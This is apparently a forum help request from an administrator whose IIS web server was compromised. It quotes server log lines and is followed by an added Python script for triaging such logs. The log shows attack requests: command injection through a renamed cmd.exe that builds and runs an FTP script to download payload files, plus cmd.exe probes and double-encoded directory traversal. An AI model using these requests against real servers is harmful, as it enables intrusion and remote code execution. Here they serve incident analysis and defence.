Help, I recently found this on my IIS server after being contacted
that my webserver attempted to scan someone's machine on port 80. I've
looked on my web box and found the following files were installed:
msxc32.exe, which seems to be the mIRC program, which is some type of chat
program. I've talked to other techs here who have not installed this
program. I've traced the following IP addresses back to the domain
admins, but before I contact them I need to know if this is the intruder's
IP address and what would be the best course of action. On the flip side,
what do I need to do to prevent this from happening in the future? I
have since blocked these addresses but this is only a temp fix.

18:56:21 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+shouldNT32.ocx+c:shouldNT32.ocx>>xl32.scr 502
18:56:23 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+echo+get+shtlng32.dll+c:shtlng32.dll>>xl32.scr 502
18:56:25 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+smba.dll+c:smba.dll>>xl32.scr 502
18:56:27 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+echo+get+sndrec32.dl_+c:sndrec32.dl_>>xl32.scr 502
18:56:33 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+thds32.exe+c:thds32.exe>>xl32.scr 502
18:56:35 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+echo+get+winsd32.ocx+c:winsd32.ocx>>xl32.scr 502
18:56:37 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+holes.txt+c:holes.txt>>xl32.scr 502
18:56:39 156.63.205.47 GET /iisadmpwd/fuck.exe?/c+echo+bye>>xl32.scr 502
18:56:54 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+ftp+-s:xl32.scr+-n+-d 502
20:20:36 216.158.145.245 GET /scripts/root.exe?/c+dir 404
20:20:36 216.158.145.245 GET /MSADC/root.exe?/c+dir 404
20:20:36 216.158.145.245 GET /c/winnt/system32/cmd.exe?/c+dir 404
20:20:36 216.158.145.245 GET /d/winnt/system32/cmd.exe?/c+dir 404
20:20:36 216.158.145.245 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404
20:20:36 216.158.145.245 GET



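A triage sketch for a log in the layout shown in the message above, added here as an example and not part of the original post. It groups requests that invoke an executable with a "/c" command by source address, decodes double-encoded traversal, and separates requests that probably ran from ones that were not found. The function names and the reading of the status codes are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Lines copied from the log above, plus one constructed benign request (last line).
SAMPLE = """\
18:56:39 156.63.205.47 GET /iisadmpwd/fuck.exe?/c+echo+bye>>xl32.scr 502
18:56:54 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+ftp+-s:xl32.scr+-n+-d 502
20:20:36 216.158.145.245 GET /scripts/root.exe?/c+dir 404
20:20:36 216.158.145.245 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404
12:00:01 192.0.2.10 GET /default.asp?id=7 200
"""

LINE = re.compile(r"^(\d\d:\d\d:\d\d)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d{3})$")
EXE_CMD = re.compile(r"\.exe\?/c\+", re.I)  # executable called with "/c <command>"

def fully_decode(s, rounds=3):
    """Percent-decode repeatedly so double-encoded bytes (%255c) surface."""
    for _ in range(rounds):
        nxt = unquote(s)
        if nxt == s:
            break
        s = nxt
    return s

def likely_ran(status):
    # Assumption to verify on your own server: IIS answers 502 when a CGI
    # program runs but returns no valid HTTP headers; 404 means not found.
    return status in (200, 502)

def triage(text):
    """Return {ip: [(time, status, command, traversal)]} for command requests."""
    hits = defaultdict(list)
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m or not EXE_CMD.search(m.group(4)):
            continue
        when, ip, _method, uri, status = m.groups()
        path, _, query = uri.partition("?")
        cleaned = fully_decode(path).replace("\\", "/")
        traversal = ".." in cleaned.split("/")
        command = query[3:].replace("+", " ")  # drop the leading "/c+"
        hits[ip].append((when, int(status), command, traversal))
    return dict(hits)

if __name__ == "__main__":
    for ip, events in triage(SAMPLE).items():
        for when, status, command, traversal in events:
            print(ip, when, status, likely_ran(status), traversal, command)
```

Requests flagged by `likely_ran` are the ones to follow up first, since they name the files to look for on disk.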